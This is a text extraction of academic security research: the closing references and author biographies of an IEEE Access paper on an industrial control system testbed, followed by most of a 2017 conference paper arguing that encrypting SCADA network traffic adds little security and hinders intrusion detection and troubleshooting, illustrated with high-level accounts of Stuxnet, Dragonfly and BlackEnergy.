7, no. 4, pp. 213232, 2014. [12] Z.-S. Lin, A. A. C rdenas, S. Amin, H.-Y. Tsai, Y.-L. Huang, and S. Sastry, ``Security analysis for process control systems,'' in Proc. 16th ACM Conf. Comput. Commun. Secur. (CCS), 2009, pp. 113. [13] A. A. C rdenas, S. Amin, Z.-S. Lin, Y.-L. Huang, C.-Y. Huang, and S. Sastry, ``Attacks against process control systems: Risk assessment, detection, and response,'' in Proc. 6th ACM Symp. Inf., Comput. Commun. Secur. (ASIACCS), 2011, pp. 355366. [14] I. Kiss, P. Haller, and A. Bere , ``Denial of service attack detection in case of tennessee eastman challenge process,'' Procedia Technol., vol. 19, pp. 835841, Dec. 2015. [15] I. Kiss, B. Genge, and P. Haller, ``A clustering-based approach to detect cyber attacks in process control systems,'' in Proc. IEEE 13th Int. Conf. Ind. Informat. (INDIN), Jul. 2015, pp. 142148. [16] P. Filonov, F. Kitashov, and A. Lavrentyev, ``RNN-based early cyber-attack detection for the tennessee eastman process,'' 2017, arXiv:1709.02232. [Online]. Available: http://arxiv.org/abs/1709.02232 [17] G. Bernieri, E. Etchev s Miciolino, F. Pascucci, and R. Setola, ``Mon- itoring system reaction in cyber-physical testbed under cyber-attacks,'' Comput. Electr. Eng., vol. 59, pp. 8698, Apr. 2017. [18] D. I. Urbina, J. A. Giraldo, A. A. Cardenas, N. O. Tippenhauer, J. Valente, M. Faisal, J. Ruths, R. Candell, and H. Sandberg, ``Limiting the impact of stealthy attacks on industrial control systems,'' in Proc. ACM SIGSAC Conf. Comput. Commun. Secur., Oct. 2016, pp. 10921105. [19] C.-T. Lin, S.-L. Wu, and M.-L. Lee, ``Cyber attack and defense on indus- try control systems,'' in Proc. IEEE Conf. Dependable Secure Comput., Aug. 2017, pp. 524526. [20] M. Teixeira, T. Salman, M. Zolanvari, R. Jain, N. Meskin, and M. Samaka, ``SCADA system testbed for cybersecurity research using machine learn- ing approach,'' Future Internet, vol. 10, no. 8, p. 76, Aug. 2018. [21] A. P. Mathur and N. O. Tippenhauer, ``SWaT: A water treatment testbed for research and training on ICS security,'' in Proc. Int. Workshop Cyber-Phys. Syst. Smart Water Netw. (CySWater), Apr. 2016, pp. 3136. [22] S. Adepu and A. Mathur, ``Distributed attack detection in a water treatment plant: Method and case study,'' IEEE Trans. Dependable Secure Comput., vol. 18, no. 1, pp. 8699, Jan. 2021. [23] J. Goh, S. Adepu, K. N. Junejo, and A. Mathur, ``A dataset to sup- port research in the design of secure water treatment systems,'' in Critical Information Infrastructures Security, G. Havarneanu, R. Setola, H. Nassopoulos, and S. Wolthusen, Eds. Cham, Switzerland: Springer, 2017, pp. 8899. [24] C. M. Ahmed, V. R. Palleti, and A. P. Mathur, ``Wadi: A water distribution testbed for research in the design of secure cyber physical systems,'' inProc. 3rd Int. Workshop Cyber-Phys. Syst. Smart Water Netw., 2017, pp. 2528. [25] V. K. Mishra, V. R. Palleti, and A. Mathur, ``A modeling framework for critical infrastructure and its application in detecting cyber-attacks on a water distribution system,'' Int. J. Crit. Infrastruct. Protection, vol. 26, Sep. 2019, Art. no. 100298. [26] V. S. Koganti, M. Ashrafuzzaman, A. A. Jillepalli, and F. T. Sheldon, ``A virtual testbed for security management of industrial control sys- tems,'' in Proc. 12th Int. Conf. Malicious Unwanted Softw. (MALWARE), Oct. 2017, pp. 8590. 16252 VOLUME 9, 2021 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed [27] F. Zhang, H. A. D. E. Kodituwakku, J. W. Hines, and J. Coble, ``Multilayer data-driven cyber-attack detection system for industrial control systems based on network, system, and process data,'' IEEE Trans. Ind. Informat., vol. 15, no. 7, pp. 43624369, Jul. 2019. [28] R. Negi, P. Kumar, S. Ghosh, S. K. Shukla, and A. Gahlot, ``Vulnerability assessment and mitigation for industrial critical infrastructures with cyber physical test bed,'' in Proc. IEEE Int. Conf. Ind. Cyber Phys. Syst. (ICPS), May 2019, pp. 145152. [29] X. Li, C. Zhou, Y.-C. Tian, N. Xiong, and Y. Qin, ``Asset-based dynamic impact assessment of cyberattacks for risk analysis in industrial con- trol systems,'' IEEE Trans. Ind. Informat., vol. 14, no. 2, pp. 608618, Feb. 2018. [30] X. Li, C. Zhou, Y.-C. Tian, and Y. Qin, ``A dynamic decision-making approach for intrusion response in industrial control systems,'' IEEE Trans. Ind. Informat., vol. 15, no. 5, pp. 25442554, May 2019. [31] J. J. Downs and E. F. Vogel, ``A plant-wide industrial process control problem,'' Comput. Chem. Eng., vol. 17, no. 3, pp. 245255, Mar. 1993. [32] N. L. Ricker and J. H. Lee, ``Nonlinear modeling and state estimation for the tennessee eastman challenge process,'' Comput. Chem. Eng., vol. 19, no. 9, pp. 9831005, Sep. 1995. [33] G. Ravi Sriniwas and Y. Arkun, ``Control of the tennessee eastman process using input-output models,'' J. Process Control, vol. 7, no. 5, pp. 387400, Oct. 1997. [34] S. Mehner and H. K nig, ``No need to marry to change your name! Attacking pro net io automation networks using DCP,'' in Proc. Int. Conf. Detection Intrusions, 2019, pp. 396414. [35] J. Akerberg and M. Bjorkman, ``Exploring security in PROFINET IO,'' in Proc. 33rd Annu. IEEE Int. Comput. Softw. Appl. Conf., 2009, pp. 406412. [36] PROFIBUS & PROFINET International (PI), Karlsruhe, Germany. PROFINET Security Guideline. Accessed: Feb. 14, 2020. [Online]. Avail- able: https://www.pro bus.com/download/pro net-security-guideline [37] M.-L. Shyu, S.-C. Chen, K. Sarinnapakorn, and L. Chang, ``A novel anomaly detection scheme based on principal component classi er,'' Naval Res. Lab., Center High Assurance Comput. Syst., Washington, DC, USA, Tech. Rep. OMB No. 0704-0188, 2003. [38] B. Sch lkopf, J. C. Platt, J. Shawe-Taylor, A. J. Smola, and R. C. Williamson, ``Estimating the support of a high-dimensional distribution,'' Neural Comput., vol. 13, no. 7, pp. 14431471, Jul. 2001. [39] M. Goldstein and S. Uchida, ``A comparative evaluation of unsupervised anomaly detection algorithms for multivariate data,'' PLoS ONE, vol. 11, no. 4, pp. 131, 2016. [40] F. Angiulli and C. Pizzuti, ``Fast outlier detection in high dimensional spaces,'' in Proc. Eur. Conf. Princ. Data Mining Knowl. Discovery. Helsinki, Finland: Springer, 2002, pp. 1527. [41] M. M. Breunig, H.-P. Kriegel, R. T. Ng, and J. Sander, ``LOF: Identifying density-based local outliers,'' SIGMOD Rec., vol. 29, no. 2, pp. 93104, May 2000, [42] F. T. Liu, K. M. Ting, and Z.-H. Zhou, ``Isolation forest,'' in Proc. 8th IEEE Int. Conf. Data Mining, Dec. 2008, pp. 413422. [43] F. T. Liu, K. M. Ting, and Z. Zhou, ``Isolation-based anomaly detection,'' ACM Trans. Knowl. Discovery Data, vol. 6, no. 1, pp. 139, Mar. 2012. [44] M. Elnour, N. Meskin, K. Khan, and R. Jain, ``A dual-isolation-forests- based attack detection framework for industrial control systems,'' IEEE Access, vol. 8, pp. 3663936651, 2020. [45] F. Pedregosa, G. Varoquaux, and A. Gramfort, ``Scikit-learn: Machine learning in Python,'' J. Mach. Learn. Res., vol. 12, pp. 28252830, Oct. 2011. [46] K. M. Ting, ``Confusion matrix,'' in Encyclopedia Machine Learning, C. Sammut and G. I. Webb, Eds. Boston, MA: Springer, 2010, p. 209. MOHAMMAD NOORIZADEH received the B.Sc. degree from Qatar University, Doha, Qatar, in 2015. He has been a Research Assistant with Qatar University since 2015. His research interests include machine learning, automation, control, and robotics. MOHAMMAD SHAKERPOUR was born in Isfa- han, Iran, in 1999. He is currently pursuing the bachelor's degree in computer engineering with Qatar University. He has been working as an Undergraduate Research Assistant with the KINDI Center for Computing Research, Qatar University, since 2018. NADER MESKIN (Senior Member, IEEE) received the B.Sc. degree from the Sharif Uni- versity of Technology, Tehran, Iran, in 1998, the M.Sc. degree from the University of Tehran, Tehran, in 2001, and the Ph.D. degree in electrical and computer engineering from Concordia Uni- versity, Montreal, QC, Canada, in 2008. He was a Postdoctoral Fellow at Texas A&M University at Qatar, Doha, Qatar, from January 2010 to Decem- ber 2010. He is currently an Associate Professor with Qatar University, and an Adjunct Associate Professor with Concordia University. He has published more than 220 refereed journal and conference papers. His research interests include FDI, multiagent systems, active control for clinical pharmacology, cyber-security of industrial control systems, and linear parameter varying systems. DEVRIM UNAL (Senior Member, IEEE) received the M.Sc. degree in telematics from Shef eld Uni- versity, U.K., and the Ph.D. degree in computer engineering from Bogazici University, Turkey, in 1998 and 2011, respectively. He is currently a Research Assistant Professor of Cyber Security with the KINDI Center for Computing Research, College of Engineering, Qatar University. His research interests include cyber-physical sys- tems and IoT security, wireless security, arti cial intelligence, and next generation networks. KHASHAYAR KHORASANI (Member, IEEE) received the B.S., M.S., and Ph.D. degrees in elec- trical and computer engineering from the Univer- sity of Illinois at Urbana-Champaign, in 1981, 1982, and 1985, respectively. From 1985 to 1988, he was an Assistant Professor with the University of Michigan at Dearborn, and he has been with Concordia University, Montreal, Canada, since 1988, where he is currently a Professor and a Concordia University Tier I Research Chair with the Department of Electrical and Computer Engineering and the Concordia Institute for Aerospace Design and Innovation (CIADI). His main areas of research interests include nonlinear and adaptive control, cyber-physical systems and cybersecurity, intelligent and autonomous control of networked unmanned systems, fault diagnosis, isolation and recovery (FDIR), diag- nosis, prognosis, and health management (DPHM), satellites, unmanned vehicles, and neural networks/machine learning. He has authored/coauthored over 450 publications in these areas. He has served as an Associate Editor for the IEEE TRANSACTIONS ON AEROSPACE AND ELECTRONIC SYSTEMS. VOLUME 9, 2021 16253
Encryption_in_ICS_networks_A_blessing_or_a_curse.pdf
Nowadays, the internal network communication of Industrial Control Systems (ICS) usually takes place in unencrypted form. This, however , seems to be bound to change in the future: as we write, encryption of network traf c isseriously being considered as a standard for future ICS. In this paper we take a critical look at the pro s and con s of traf c encryption in ICS. We come to the conclusion that encryptingthis kind of network traf c may actually result in a reduction of the security and overall safety. As such, sensible versus non- sensible use of encryption needs to be carefully considered both in developing ICS standards and systems. I. I NTRODUCTION SCADA (Supervisory Control and Data Acquisition) sys- tems and DCS (Distributed Control Systems) form an impor-tant subset of ICS (Industrial Control Systems), overseeingcomplex physical processes in industrial and critical infras-tructures which usually span over a large geographic area(e.g. a pipeline, an electrical grid). Over the last decades,ICS have evolved from largely isolated systems to largelyinterconnected ones, boosting ef ciency but opening up thepossibility of cyberattacks; indeed, in the last decade, wehave witnessed a number of attacks on ICS [5], [25], [10],[7], [23], [4], [12], [30], [31], [15], [2]. The response from the ICS community has been to in- crease the attention to the security mechanisms already in place, and to look for new ways to defend against maliciousentities. One of the proposed mechanisms to secure ICS is toencrypt communications transmitted over SCADA networks.A few proposals are on the table and, at the time ofwriting this article, there is a committee discussing a possible standardization for the use of encryption on ICS networks. It is well-known that security always comes at a cost, which is not only monetary, but also in terms of e.g. usability of the system [27]. It is therefore important to evaluatewhether a solution is actually worth its costs. To make suchan evaluation one has to take into due consideration theattacker model at hand, the possible attacker model in the future, and the business model of the stakeholders in the ICS. This paper aims at contributing to the discussion on the pro s and con s of network encryption for ICS by providinga basis for analysing the costs and the bene ts of such asolution. We determine key threats by considering recentreported ICS attacks. As the business model of the speci ctarget ICS will also in uence the discussion, the reasoningand the conclusions of this work have to be instantiated intelligently to the various application elds. Yet there aresome generally applicable conclusions we believe apply to ICS architectures in general. The rst conclusion is that, in most cases, introducing encryption (in the ICS internal network) does not yieldextra security. None of the attacks we considered wouldhave been blocked or made more dif cult by the additionof encryption. Encryption aims at mitigating con dentialityleaks on the wire , while the witnessed attacks target end- points. Also, in many of the attacks, con dentiality is notthe security goal being breached. We know of no record of an attack on the wire occurring in practice, whilemany damaging hypothetical attacks may be mitigated byauthentication checks rather than encryption. The second conclusion is that encryption can actually have negative consequences for security. For instance, manyattacks can be detected with state-of-the-art Network Intru-sion Detection Systems (NIDS), provided that the NIDS hasaccess to the communication contents. Of course, one canimplement encryption with appropriate taps for intrusion detection, but this adds to the cost of the solution. The third and last conclusion is that encryption can considerably raise the costs of troubleshooting and recovery.For instance, problems (e.g., communication troubles, re-transmissions, failing devices, etc.) can be identi ed (much)more quickly and easily in an unencrypted network than in an encrypted one. We do not advocate completely ruling out encryption of ICS network traf c: in some cases it makes a lot of sense (forinstance, long-haul connections over untrusted networks, and in systems operating in an adversarial environment). Instead, we advocate healthy reasoning on what encryptionis actually good for, and what are its costs, particularly interms of the loss of safety and security it may actuallyintroduce . Note also that in most situations in the ICS world, one only needs to achieve authentication and integrityof the communication, and this can be done without full- edge encryption (the latter being needed only to guarantee con dentiality.) In the remainder of this paper, we rst establish the setting in Sections II-IV by providing a general descriptionof SCADA systems, their key security requirements relatedto encryption and the main cryptographic protocols beingconsidered for use as standards for SCADA systems. Next,we determine key threats by looking at recent attacks onSCADA systems in Section V. We then support each of thethree conclusions above in Sections VI-VIII before providing 1IEEE International Conference on Smart Grid Communications 23-26 October 2017 // Dresden, Germany 978-1-5386-4055-5/17/$31.00 2017 IEEE 289Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:52 UTC from IEEE Xplore. Restrictions apply. conclusions in Section IX. II. SCADA SYSTEMS OVERVIEW In this section we introduce the basics, the architecture and the communication strategies of SCADA systems as a basis for the security discussion in the following sections.Both ICS and SCADA systems monitor and control physicalprocesses. A key feature of SCADA systems is that they op-erate over multiple geographical locations and, as such, their communication networks need to span over large distances. Engineering Station HMI Station Corporate Network Firewalled gateway/router Interoperability Server Database Server Application Server RTU/ PLC Control Center Relay           RTU/ PLC Pressure sensor Level alarm Valve Ammeter Remote Station 1 Remote Station 2 Fig. 1. Simpli ed architecture of a SCADA system1 Figure 1 presents a simpli ed model of an industrial con- trol system connected through a SCADA network which issuf cient for our purposes. Several geographically distributed remote stations are interconnected with a control center. This could be through a dedicated link or via the Internet. Each of the stations deals with a different part of a physical process, gathering data through sensors (e.g. thepressure sensor in Remote Station 2), and/or controllingthe process through actuators (e.g. the valve at the samestation). These end devices are monitored and controlledover a local network by Programmable Logic Controllers(PLC) and Remote Terminal Units (RTU). These are inturn interconnected to each other, possibly in hierarchicalmaster/slave architectures or across remote stations, in orderto coordinate the monitoring of the process. Often industrial systems also have a dedicated control center (CC) to govern the entire process. A typical CCconsist of different components, such as SCADA applicationservers to monitor and control the process, Human-MachineInterfaces (HMI) for operators to interact with the SCADAsoftware, database servers with historical records, or interop-erability servers (using standards such as IEC 61850 or OPC-UA, de ned in IEC 62541 [6]) for interconnecting SCADAsoftware and hardware devices from different vendors. TheCC is usually physically separated from other parts of thesystem, and relies on a gateway/router to communicate withthe remote stations. Originally, the connection between the CC and the remote stations was done through narrowband radio, dedicated wiredlinks or even satellite systems. The need for integration ofservices (i.e. rmware update, remote access) has removedthe tight separation between SCADA and business networks; 1Icons source: www.vrt.com.au/downloads/vrt-network-equipmentand to standardize communications over all these differentphysical media, SCADA networks are moving to using IP-based networking [20]. For backwards compatibility, mes-sages are repackaged into a TCP/IP wrapper allowing reuseof message formats and existings protocols, such as Modbus.A router/gateway at each remote station serves as interfacebetween IP-based networks on the outside and the eldbus protocol-based SCADA networks on the facility oor. The communication between the control center and de- vices within remote stations can be categorized into fourtypes [33], namely: data acquisition requests, rmware up-load, control functions and broadcast messages. These dif- ferent types of messaging are usually implemented through arequest/response model with clear text messages, following a device vendor proprietary communication protocol. With these main ICS/SCADA network components in place, we next look at the security needs of such systems. III. S ECURITY PROPERTIES AND ENCRYPTION Encryption is often seen as a method to improve the security of a system. However, to really evaluate the securityof a system we rst need to know its security requirements. Capturing security requirements (for ICS). The security requirements for an ICS can be expressed using the classic C.I.A. triad of con dentiality, integrity, and availability,along with authenticity. These are useful to capture thesecurity requirements for any information system. However,priorities of different security requirements in an ICS areinherently distinct from those of a typical IT environment. In ICS, timely process execution availability is the abso- lute priority, especially for critical infrastructure or a coreprocess of the production line [36]. Process availability isachieved through the sub-requirements of network availabil-ity and data correctness, which are also essential to ensurecontinuous monitoring of faults, anomalies, and potentialthreats [11]. Correctness of data sent over an untrustednetwork requires message authenticity , which is a combi- nation of source authentication , i.e. establishing the identity or role of the sender of a message, and message integrity , i.e. assuring data has not been altered during transmission.If the data is valuable, private, or otherwise con dential, wealso need message con dentiality . Traditionally, SCADA networks were built on the as- sumption that only trusted components and entities wouldbe able to connect to them. Thus there were no con den- tiality concerns, and integrity checks against faults were suf cient to also achieve messages authenticity. However,nowadays SCADA networks are more accessible and mayutilize untrusted networks such as the internet, requiringenforcement and validation of message authenticity, and data con dentiality. Achieving security requirements. Different cryptographic techniques may satisfy the requirements mentioned above by concealing and/or validating communications. A common interpretation, which we follow in this paper, of the termencryption (of traf c) is that of obfuscating the content 2IEEE International Conference on Smart Grid Communications 23-26 October 2017 // Dresden, Germany 290Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:52 UTC from IEEE Xplore. Restrictions apply. of messages, i.e. enciphering messages for con dentiality. Encrypted messages can then be read only by parties in possession of the appropriate decryption key: typically, thisrestricts visibility to just the endpoints of the connection. Cryptographic techniques can be used to authenticate a party and its messages, for example through the use of publickey cryptography with keys validated by digital certi catesissued by trusted third parties. We will refer to any cryp-tographic technique and key/certi cate management strategyto achieve authenticity as an authentication scheme. Note that, depending on the cipher and the way it is applied, encryption (i.e. enciphering for con dentiality) mayalso help to check the integrity and establish the authenticityof messages; encryption and authentication may be achievedby the same cryptographic operation. However, as we aretrying to clarify the reasons for using speci c techniques,we will still address them as separate requirements. IV . E NCRYPTION PROTOCOLS FOR SCADA ICS standards suggest several protocols to achieve en- cryption. For example IEC 62351 [8], for power systemsinfrastructure, recommends end-to-end protocol TLS andpoint-to-point protocol IPsec; while OPC-UA, for indus- trial automation systems, refers to end-to-end protocol WS-Security. Here we discuss the protocols recommended by IEC 62351 and use them as examples during the discussion.However, the conclusions that we draw in this paper arenot restricted to just these two schemes or the eld of power systems: since we discuss in terms of general securityproperties, the main reasoning remains applicable to the whole eld of securing SCADA networks. According to IEC 62351, Transport Layer Security (TLS) is to be added to the most common TCP/IP industrialprotocols such as MMS, DNP3, and IEC 60870-5-104;moreover, the standard discusses the applicability of well-proven standards from the IT domain, such as IPsec. TLS. TLS creates sessions that provide entity authentication, payload secrecy and message integrity. It accomplishes thisby setting up secure sessions using asymmetric public/privatekeys and digital certi cates issued by trusted third-party entities known as Certi cate Authorities (CA). A MessageAuthentication Code (MAC) is appended to each message ina TLS connection to validate a packet s integrity and avoid replay attacks. The MAC is generated from the message s data payload and a shared secret key. Setting up a sessionconsists of two round trips: the rst authenticates the serverto the client, who validates the server s digital certi catesignature against a list of trusted CA in the client s posses-sion. Client authentication is usually left to the applicationlayer, see e.g. IEC 62351 and OPC-UA. The second roundtrip completes the handshake by negotiating which crypto-graphic protocol to use, along with a corresponding uniquesymmetric session key. This key is used to encrypt thecontent of the messages exchanged during the session: sinceTLS works at the transport layer, it does not encrypt therouting information on the lower network layer. An externalobserver that intercepts a TLS secured datagram is limited inthe amount of information that he can extract from it: only the endpoints of the communications, along with the type ofencryption and approximate size of the data are revealed. IPsec. The IPsec protocol [19] concerns the network layer and can be implemented in legacy networks as a bump-in-the-wire, i.e. without altering the endpoints. An IPsec connection is initiated in two phases, according to the Internet Key Exchange (IKE) protocol: Phase 1 has the purpose of generating the shared secret keying material toestablish a secure authenticated channel between two peers.Using this channel, Phase 2 negotiates the IPsec securitypolicies to be applied to the data ow, and encrypts the data ow using the keys from Phase 1. After the connection isover, those keys are discarded. To authenticate peers, IPsecuses pre-shared keys, or digital certi cate signed by a CA. IPsec provides two extension protocols: Authentica- tion Header (AH)[17] and Encapsulating Security Payload(ESP)[18]. AH offers data integrity and source authenticationfor both IP header and payload. As the packet s content isnot encrypted, it can still be inspected by a rewall or anIDS. ESP offers data integrity, source authentication, andencryption, and is therefore more widely used in practice;note, however, that the ESP protocol is only applied to thepayload and not to the IP header. IPsec is used in one of twomodes: tunnel or transport, of which tunnel mode is recom-mended for establishing secure site-to-site communicationsfrom an untrusted network to the control network in SCADAsystems [29], [34]. In either mode, the payload is encrypted(using ESP) or authenticated (using AH). In tunnel modeheaders are also protected, as the source endpoint encrypts(or authenticates) the entire packet and then encapsulatesit in another IP packet. The receiving gateway will thenperform the unpacking, decryption (or authentication check)and internal routing necessary to transmit the packet to the nal destination device on the trusted network. Tunnel modecan be gateway-to-gateway or host-to-gateway; in either case,the authentication and con dentiality provided by IPsec stopat the receiving gateway and are not fully end-to-end. V. A TTACKS ON SCADA SYSTEMS When checking whether a given approach indeed achieves a security goal, one needs to consider the type of attacksagainst which they are supposed to defend. To create a broadand representative overview on the current threats to SCADAsystems, we have listed (see the rst column of Table I) con rmed attacks on SCADA systems from the RISI incident database [1] and recent V erizon data breach digests [30],[31]. Note that we restrict our attention to real attacks:e.g. [36] gives a list of vulnerabilities and potential misuses,some preventable by encryption, but they do not match whatis seen in practice. We describe three successful attacks in more detail, namely: Stuxnet, causing physical damage to equipment; Dragon y, stealing intellectual property data; BlackEnergy, disrupting a wide public infrastructure. 3IEEE International Conference on Smart Grid Communications 23-26 October 2017 // Dresden, Germany 291Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:52 UTC from IEEE Xplore. Restrictions apply. Stuxnet. The Stuxnet malware attack was conducted in 2010, targeting Iranian nuclear enrichment facilities [23]. Stuxnet operated in three stages [14]. In the rst stage, the initial infection was likely con- ducted via an infected USB ash drive from a compromised equipment vendor. Secondly, it spread locally through theSCADA network in three ways: using the normal LAN, viaremovable drives, and by infecting les used by SiemensPLCs. The objective of this phase was to look for computerspossessing the Siemens WinCC SCADA software, typically used to program PLCs, and to establish a foothold onthose machines. The third and nal stage probed for PLCs connected to the WinCC system: once found, malicious codewas injected to stealthily control speci c centrifuges, makingthem operate at unsafe speeds and resulting in a higherbreakdown rate [24]. Dragon y. The Energetic Bear/Dragon y campaign of 2011 focused on industrial espionage and intellectual propertytheft rather than taking control of the industrial process. Itspeci cally targeted industrial gateways and routers used inaviation, energy generation and distribution, pharmaceutical,food and beverage industries [21]. The infection happened in three phases [26], [4]: ini- tially, the attackers delivered malware through spear-phishing emails; then, they performed a watering hole attack byredirecting traf c from legitimate websites; and nally, theyinfected third-party applications that ICS device vendorsmade available online, thus compromising the supply chain.The malware then communicated to a command and control (C&C) server via HTTP , downloaded additional modules es-tablishing persistence, and scanned the local drives collecting information about the network layout, as well as ICS andVPN con guration les, and authentication credentials. Itdid not spread over the local network. Its nal stage wasto use an industrial protocol scanner to search the local network for any OPC services (see Fig. 1), or for devices and applications that were listening on TCP ports of commonSCADA protocols. A compromised OPC could have grantedan attacker full control over the SCADA system, but theattackers made no attempt to control the ICS devices: instead, the gathered data about the SCADA network layout was sent back to the C&C server. BlackEnergy. In late 2015, three Ukrainian power distribution utilities suffered a coordinated attack that caused a blackoutfor several hours [32]. The attack was conducted in two main stages, separated by months [12]: rst, the attackers used phishing emailsto penetrate the utilities IT networks and plant the Black-Energy 3 malware. The malware connected to its C&Cserver, moved horizontally and harvested credentials to gainVPN tunnelling access to the SCADA network; once there,it completed the initial reconnaissance by discovering theserial-to-ethernet eld devices used by the remote stationsto decode commands from the command center. Six monthslater, the attackers used the malware to take control of theSCADA workstations and HMI, locking out operators andmanually issuing commands to open the remote stations breakers, thus causing the blackout. At the same time, theydeployed malicious custom rmware on the gateway devices,disabling them and preventing recovery. VI. W HERE ENCRYPTION FAILS With basic de nitions and a description of key attacks in place, we can now evaluate our rst thesis: encryption often does not yield extra SCADA security. To this end we consider the impact of encryption on the attacks described above. Stuxnet. Recall that Stuxnet comprises three stages. The rst stage, i.e. the initial infection through a compromised USB drive, did not involve network communication. In thesecond and third stages, Stuxnet rst spread on the LAN andthen infected WinCC database servers; the infected WinCCsystems then uploaded control code to the PLCs, as theywere authorized to. However, this code had malicious con-tent. In both stages, all communication were between validparties that trusted each other. The endpoints vulnerabilitiesexploited in the second stage to spread Stuxnet, and themalicious content transmitted to PLCs during the third stage,did not affect the proper establishing of the connections. As such, encryption wouldn t have impeded the attack at all. Dragon y. The Dragon y campaign used standard business level malware techniques, focused on the target s corporatenetwork [21]. Once there, the malware gathered locallystored authentication credentials that enabled authorized ac- cess to other remote industrial systems. In around 5% of theinfections, the malware included a module to capture creden-tials sent over unencrypted HTTP traf c from a browser[4], [3]. Also, the attackers tried to discover and probe OPCservices on LAN hosts, by using the valid interfaces thatwere already present on the infected machines. The situation was the same as with Stuxnet, in that the attackers exploitedvulnerabilities on the end points, while all the communica- tions on the network was between valid parties. Only in somerare cases, encryption would have hindered a small portionof the information gathering performed by the malware. BlackEnergy. The attackers in ltrated a business workstation through email, spread their malware on the LAN, and thenharvested credentials to gain legitimate and authorized ac-cess to the SCADA network, bypassing the security at thegateways of the remote stations. Using existing remote ad-ministration tools, the attackers used native connections andcommands [12] to discover the ICS devices on the remotestations local networks; to upload the custom malicious rmware to the gateways; and to control the breakers througha panel. All these malicious actions compromised endpointsrather than connections, and therefore would not have beenimpacted by encrypting SCADA traf c. As stated before, encrypting a communication channel protects the con dentiality of a message during its transmis-sion. This is relevant in the case where potential attackersreside along the transmission path of the message, eitherintercepting it as a Man-in-the-middle or just passivelylistening to it. On the other hand, if the attackers compromise 4IEEE International Conference on Smart Grid Communications 23-26 October 2017 // Dresden, Germany 292Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:52 UTC from IEEE Xplore. Restrictions apply. Brief Description Encr . Net Mon. Y ear Industry Stuxnet Malware Targets Uranium Enrichment Facility [1], [14] X O f,c [24] 2010 Power/utility Russian-Based Dragon y Group Attacks Energy Industry [1], [4] X O f,c [22] 2014 Power/Utility Cyber-Attack Against Ukrainian Critical Infrastructure [1], [12] X O f,c [32] 2016 Power/Utility Malware on manufacturing OT network [31] x O f,c [31] 2017 Manufacturing Hacktivist control PLCs of Kemuri Water Company [30] x oc 2016 Water treatment Public utility compromised after brute-force hack attack [1] x o f,c 2014 Power/utility U. S. Power Plant Infected With Malware from USB [1] x ? 2012 Power/utility U. S. Electric Utility Mariposa Virus Infection [1], [16] x O f,c [16] 2012 Power/utility Disk-wiping Shamoon virus knocks out computers at Qatari gas rm RasGas [1] x ? 2012 Petroleum Gas Company Virus Infection from USB [1] x ? 2012 Petroleum Auto Manufacturer Suffers Data Breach from Virus [1] ? ? 2012 Automotive Process Control Network Infected with a Virus from Laptop [1] x ? 2012 Petroleum Industrial Control System Hacked Using Backdoor Posted Online [1], [15] x o f,c 2012 Other South Houston Water Treatment Plant Hack [1] x ? 2011 Water/Waste Steel plant infected with Con cker Worm [1] x o f,c 2011 Metals Brute-Force Attack on Texas Electricity Provider [1] x of 2010 Power/utility TABLE I ANAL YSIS OF RECENT SCADA INCIDENTS a communication endpoint, as it happened in our examples, it s easy to obtain the keys and con guration les to establishvalid connections to other devices in the SCADA network,and pivot the attack to those. The second column of Table I summarizes the evaluation of the different attacks. For the three attacks studied in detail,encryption did not help (indicated by X in the table). Thesame conclusion can be reached for the others, based on ageneral description of the attack (indicated by x ). In onecase (indicated by ? ) we did not have enough informationon the attack to evaluate whether encryption would havehelped. The table clearly validates our rst thesis; encryptionis not able to stop most of these attacks. VII. T HREA TS OF ENCRYPTION TO SECURITY In this section we evaluate our second thesis: Encryption can have negative consequences for security. Encryption decreases visibility of data, not only for potential attackers, but also for security tools trying to evaluate this data such as network monitoring solutions. With respect to monitoringwe distinguish two main categories; ow-based solutionse.g. [28] that only consider the amounts of communicationand the end-points involved, and content-based solutionse.g. [13], [35] that also consider the actual content of thecommunications. Flow-based solutions may still work if thecommunication is encrypted, but this depends on the exactapproach and the method of encryption. IPSec tunnel mode,for example, would prevent (some forms of) ow-basedanalysis on the link it is applied on. Clearly, content-basedsolutions would be prevented from fully analysing data thatis encrypted with keys the monitoring system does not have. In the third column of Table I we indicate whether the attacks could have been detected by network monitoring,distinguishing between cases (marked O ) where detection is certainly possible, as reported by the indicated publications,and cases (marked o ) where we believe detection shouldbe possible based on a high level evaluation of the attack.All three attacks discussed in Section V could have been detected by an appropriate network monitoring solution. Wefurther indicate whether ow-based (f) and content-based (c)monitoring is involved. Several attacks (marked f,c) can be detected by ow-based monitoring but require content-basedapproaches to identify what type of attack is happening. We have several cases where we did not nd any claims that the attack is detectable with a given approach, and theattacks descriptions are not suf cient to determine whetherknown approaches would work. As such, there are severalcases that are indicated as unknown (?). Still, several attacksrequire content-based approaches to identify or even to detectthem at all. This already validates our second thesis; in manycases encryption hinders other security solutions and thusmay actually decrease the security of the system. VIII. T HREA TS OF ENCRYPTION TO SYSTEM OPERA TIONS In this section we evaluate our third thesis: Encryption increases troubleshooting and recovery costs. To this end we consider several causes that can motivate troubleshooting. Network congestion. Upon slow operator terminal updates one would check the LAN for overload [9, Sec. 8.2]. Quoting from [31]: over the past few months, the net- work seemed sluggish , which the automation engineers andSMEs attributed to older, legacy equipment. [...] With the co-operation of [company], we set up a Switched Port Analyzer (SPAN) port and deployed a passive network analyzer to collect and analyze the traf c. If the traf c was encrypted, this common troubleshooting task would have been hindered. A possible cause for congestion is a device ooding the network, e.g. due to miscon guration or a virus attack. Anexample of the latter was the Con cker worm infecting asteel plant in 2011 [1]: The virus ooded the network withunwanted packets and caused an instability in the communi-cations between PLCs and supervisory stations and freezing most of the supervisory systems. While the presence of the aw is clear, a full diagnosis requires looking at the content of the communication and possibly listening from differentlocations, to identify the source of the anomalous traf c. Non-healthy devices. Upon missing updates, alarms or un- expected behaviour one would evaluate the health of related components. After basic (hardware) checks, [9, Sec. 6.10]recommends checking an individual component s health by 5IEEE International Conference on Smart Grid Communications 23-26 October 2017 // Dresden, Germany 293Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:52 UTC from IEEE Xplore. Restrictions apply. using a protocol analyser to look for errors or inconsistencies in its traf c. Components failing health tests should be read- 